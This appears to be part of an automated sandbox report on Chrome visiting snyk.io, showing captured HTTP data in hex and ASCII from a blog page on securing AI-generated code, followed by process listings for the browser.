                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:17 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 68 79 70 65 72 6c 69 6e 6b 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 20 61 63 72 6f 73 73 20 74 68 65 20 73 65 63 75 72 69 74 79 20 69 6e 64 75 73 74 72 79 2e 20 49 66 20 79 6f 75 20 66 69 6e 64 20 77 68 61 74 20 79 6f 75 20 74 68 69 6e 6b 20 69 73 20 61 20 76 75 6c 6e 65 72 61 62 69 6c 69 74 79 20 61 6e 64 20 64 6f 6e 27 74 20 6b 6e 6f 77 20 68 6f 77 20 74 6f 20 70 72 6f 63 65 65 64 20 74 6f 20 72 65 73 70 6f 6e 73 69 62 6c 79 20 64 69 73 63 6c 6f 73 65 20 69 74 2c 20 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 22 75 72 69 22 3a 22 68 74 74 70 73 3a 2f 2f 73 6e 79 6b
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000xt"}],"nodeType":"hyperlink"},{"data":{},"marks":[],"value":" across the security industry. If you find what you think is a vulnerability and don't know how to proceed to responsibly disclose it, ","nodeType":"text"},{"data":{"uri":"https://snyk
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:17 UTC12INData Raw: 65 65 64 20 61 20 73 65 63 75 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: eed a secu
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:17 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 72 69 74 79 20 63 6f 6d 70 61 6e 69 6f 6e 20 66 6f 72 20 41 49 2d 67 65 6e 65 72 61 74 65 64 20 63 6f 64 65 5c 22 20 2d 20 73 65 6f 22 2c 22 74 69 74 6c 65 22 3a 22 57 68 79 20 79 6f 75 20 6e 65 65 64 20 61 20 73 65 63 75 72 69 74 79 20 63 6f 6d 70 61 6e 69 6f 6e 20 66 6f 72 20 41 49 2d 67 65 6e 65 72 61 74 65 64 20 63 6f 64 65 20 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 70 65 65 64 20 75 70 20 73 65 63 75 72 69 74 79 20 66 6f 72 20 41 49 20 67 65 6e 65 72 61 74 65 64 20 63 6f 64 65 20 77 69 74 68 20 61 20 73 65 63 75 72 69 74 79 20 63 6f 6d 70 61 6e 69 6f 6e 20 74 68 61 74 20 77 6f 72 6b 73 20 61 6c 6f 6e 67 73 69 64 65 20 67 65 6e 65 72 61 74 69 76 65 20 41 49 2c 20 65 6e 61 62 6c 69 6e 67 20 62 6f 74 68 20 65
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000rity companion for AI-generated code\" - seo","title":"Why you need a security companion for AI-generated code ","description":"Speed up security for AI generated code with a security companion that works alongside generative AI, enabling both e
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:17 UTC8204INData Raw: 22 76 61 6c 75 65 22 3a 22 41 49 20 69 73 20 6e 6f 74 20 61 20 6e 65 77 20 74 6f 70 69 63 20 64 65 73 70 69 74 65 20 43 68 61 74 47 50 54 20 64 72 69 76 69 6e 67 20 72 65 63 65 6e 74 20 69 6e 74 65 72 65 73 74 2c 20 73 6f 20 69 6e 20 63 61 73 65 20 79 6f 75 20 77 69 73 68 20 74 6f 20 6c 65 61 72 6e 20 6d 6f 72 65 2c 20 74 68 65 72 65 20 69 73 20 61 20 64 61 7a 7a 6c 69 6e 67 20 63 6f 6c 6c 65 63 74 69 6f 6e 20 6f 66 20 63 6f 6e 74 65 6e 74 20 61 76 61 69 6c 61 62 6c 65 2c 20 69 6e 63 6c 75 64 69 6e 67 20 22 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 64 61 74 61 22 3a 7b 7d 7d 2c 7b 22 6e 6f 64 65 54 79 70 65 22 3a 22 68 79 70 65 72 6c 69 6e 6b 22 2c 22 64 61 74 61 22 3a 7b 22 75 72 69 22 3a 22 68 74 74 70 73 3a 2f 2f 73 6e 79 6b 2e 69 6f 2f 62 6c 6f 67 2f 3f
                                                                                                                                                                                                                                                                                                              Data Ascii: "value":"AI is not a new topic despite ChatGPT driving recent interest, so in case you wish to learn more, there is a dazzling collection of content available, including ","marks":[],"data":{}},{"nodeType":"hyperlink","data":{"uri":"https://snyk.io/blog/?


                                                                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                                                                                              Start time:15:48:45
                                                                                                                                                                                                                                                                                                              Start date:24/10/2024
                                                                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                                                                                                                                              Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                                                                                                              Start time:15:48:47
                                                                                                                                                                                                                                                                                                              Start date:24/10/2024
                                                                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2272,i,10802499006494402137,4490958038480893554,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                                                                              Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                                                                                              Start time:15:48:49
                                                                                                                                                                                                                                                                                                              Start date:24/10/2024
                                                                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://snyk.io"
                                                                                                                                                                                                                                                                                                              Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                              No disassembly